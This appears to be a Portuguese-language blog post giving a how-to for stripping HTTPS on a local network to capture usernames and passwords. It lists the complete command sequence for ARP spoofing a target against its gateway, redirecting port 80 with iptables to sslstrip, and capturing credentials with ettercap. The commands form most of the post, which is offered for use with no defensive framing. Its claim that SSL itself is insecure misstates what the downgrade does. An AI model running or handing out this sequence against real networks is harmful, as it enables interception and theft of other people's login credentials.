• homepost1

  • homepost4

  • homepost2

  • homepost5

  • homepost3

  • homepost6

  • homepost7

Sniffer SSL - https

Nesta video vou mostrar como a criptografia SSL não e seguro. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafico da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).

Programas usados:

Programas usados:
SSLstrip
ARPspoof
Ettercap
Comando usados:
Citação:
kate /etc/etter.conf
* Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.6 10.1.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i eth0
OBS: Se sua internet for wireless no lugar de "eth0" coloca-se "wlan0", o "0" vai depende de qual placa de rede você vai ultilizar.

Todas os programas são encontrados no backtrack 4


Baixar: http://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html

Assista on-line: http://bhior.blip.tv/file/3525086


Filed Under: ,

About the Author

My name is Dinh Quang Huy or known as alias NhamNgaHanh .I made this template in magazine style and named it Simplex Darkness .I hope it helpful to persons who want a solutions for a template in Blogspot.To download this template and see template install instruction ,go to Simplex Design blog.

Leave a Reply